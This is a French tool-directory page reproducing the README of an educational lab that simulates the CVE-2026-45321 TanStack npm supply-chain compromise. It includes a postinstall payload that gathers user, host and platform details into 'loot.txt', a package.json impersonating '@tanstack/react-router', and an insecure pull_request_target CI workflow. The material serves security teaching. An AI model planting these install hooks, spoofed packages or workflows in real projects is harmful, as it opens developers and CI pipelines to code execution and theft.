Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-45321-Tanstack — Laboratoire pédagogique simulant des attaques sur la chaîne d'approvisionnement npm, des abus CI/CD et l'exécution de code au moment de l'installation via CVE-2026-45321. Recherche défensive en sécurité pratique pour comprendre la compromission des dépendances et l'exploitation des hooks de cycle de vie. | Kitploit
Outils/GitHubGitHub/renewablehacking/cve-2026-45321-tanstack
Analyse des VulnérabilitésAnalyse de MalwareSécurité de la Chaîne LogistiqueApprentissage et ÉducationLabs et Pratique
GitHubrenewablehacking/cve-2026-45321-tanstack

CVE-2026-45321-Tanstack

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

il y a 2 moisPas encore vérifié

Laboratoire pédagogique simulant des attaques sur la chaîne d'approvisionnement npm, des abus CI/CD et l'exécution de code au moment de l'installation via CVE-2026-45321. Recherche défensive en sécurité pratique pour comprendre la compromission des dépendances et l'exploitation des hooks de cycle de vie.

Partager

Simulation d'Attaque sur la Chaîne d'Approvisionnement — CVE-2026-45321 (TanStack)

Laboratoire pédagogique pour comprendre les attaques sur la chaîne d'approvisionnement npm, l'abus des CI/CD et l'exécution de code au moment de l'installation

Avertissement

Ce projet est créé uniquement pour :

  • l'apprentissage de la cybersécurité,
  • la recherche en sécurité défensive,
  • la simulation en laboratoire local,
  • la compréhension du concept d'attaque sur la chaîne d'approvisionnement.

N'utilisez pas ce projet pour :

  • attaquer des systèmes réels,
  • voler des identifiants,
  • déployer des logiciels malveillants,
  • accéder sans autorisation,
  • ou toute autre activité illégale.

Description

Ce laboratoire simule les concepts fondamentaux de l'incident :

  • CVE-2026-45321
  • Compromission de la chaîne d'approvisionnement npm de TanStack
  • Abus de GitHub Actions CI/CD
  • Exécution de scripts du cycle de vie npm

La simulation est réalisée localement et en toute sécurité, sans :

  • véritable vol d'identifiants,
  • exfiltration de jetons,
  • compromission de services tiers.

Structure du Laboratoire

root@kitploit:~
lab/
├── fake-repo/          # Simulation du dépôt cible
├── attacker-package/   # Simulation du paquet malveillant
└── victim-project/     # Simulation de la victime

Fonctionnement de la Simulation

root@kitploit:~
Paquet Attaquant
        ↓
npm install
        ↓
Le script postinstall s'exécute
        ↓
payload.js est exécuté automatiquement
        ↓
La victime subit une exécution au moment de l'installation

Concepts Abordés

  • hooks du cycle de vie npm
  • exécution arbitraire de code au moment de l'installation
  • attaque sur la chaîne d'approvisionnement
  • frontière de confiance CI/CD
  • paquet npm malveillant
  • abus de postinstall
  • compromission de dépendance

Installation

1. Cloner le Dépôt

root@kitploit:~
git clone https://github.com/renewablehacking/CVE-2026-45321-Tanstack.git

cd CVE-2026-45321-Tanstack

Configuration du Paquet Attaquant

2. Aller dans le Dossier du Paquet Attaquant

root@kitploit:~
cd attacker-package

3. Installer les Dépendances

root@kitploit:~
npm install

4. Construire l'Archive du Paquet

root@kitploit:~
npm pack

Résultat :

root@kitploit:~
tanstack-react-router-1.169.5.tgz

Simulation de la Victime

5. Aller dans le Projet Victime

root@kitploit:~
cd ../victim-project

6. Installer le Paquet Malveillant

root@kitploit:~
npm install ../attacker-package/tanstack-react-router-1.169.5.tgz --foreground-scripts

Sortie

Si la simulation réussit, le message suivant apparaîtra :

root@kitploit:~
=== MALICIOUS PAYLOAD EXECUTED ===

et le fichier :

root@kitploit:~
loot.txt

sera créé automatiquement.


Exemple de payload.js

root@kitploit:~
const os = require('os');
const fs = require('fs');

console.log("=== MALICIOUS PAYLOAD EXECUTED ===");

const info = `
USER=${process.env.USER}
HOST=${os.hostname()}
PLATFORM=${os.platform()}
`;

console.log(info);

fs.writeFileSync("loot.txt", info);

Exemple de package.json

root@kitploit:~
{
  "name": "@tanstack/react-router",
  "version": "1.169.5",
  "scripts": {
    "postinstall": "node payload.js"
  }
}

Simulation CI/CD

Ce projet peut également être utilisé pour comprendre :

  • GitHub Actions
  • pull_request_target
  • frontière de privilèges CI/CD
  • exécution de dépendances

Exemple de workflow :

root@kitploit:~
name: CI

on:
  pull_request_target:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4

      - run: npm install

Lien avec CVE-2026-45321

Simulation en LaboratoireMonde Réel
attacker-packagepaquet TanStack compromis
payload.jsinstalleur malveillant

Références

  • https://nvd.nist.gov/vuln/detail/CVE-2026-45321
  • https://tanstack.com/blog/npm-supply-chain-compromise-postmortem
  • https://docs.npmjs.com/cli/v10/using-npm/scripts
  • https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions

Usage Pédagogique Uniquement

Ce laboratoire a été créé pour sensibiliser à :

  • la sécurité de la chaîne d'approvisionnement,
  • la sécurité des dépendances,
  • la sécurité des CI/CD,
  • et la recherche en sécurité défensive.
Télécharger l’outil
postinstallabus de hook de cycle de vie
victim-projectdéveloppeur/CI victime
fake-repopipeline GitHub Actions